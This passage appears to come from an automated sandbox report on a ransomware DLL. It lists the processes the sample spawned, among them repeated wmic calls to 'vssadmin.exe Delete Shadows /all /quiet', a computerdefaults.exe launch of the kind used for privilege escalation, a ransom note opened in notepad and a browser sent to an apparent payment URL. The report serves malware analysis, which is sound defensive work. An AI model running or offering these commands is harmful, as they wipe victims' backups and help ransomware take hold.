PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4268 wrote to memory of 532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\cb0261d9a3e77ffecdb51914b3690f18_JaffaCakes118.dll,#1

C:\Windows\system32\notepad.exe

notepad.exe C:\Users\Public\readme.txt

C:\Windows\system32\cmd.exe

cmd /c "start http://78800e98f0cc24503uahnpdvb.iecard.top/uahnpdvb^&2^&42229745^&62^&319^&2219041"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://78800e98f0cc24503uahnpdvb.iecard.top/uahnpdvb&2&42229745&62&319&2219041

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0xf8,0x130,0x7ffd63e246f8,0x7ffd63e24708,0x7ffd63e24718

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1972 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3536 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3536 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1712 /prefetch:1

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

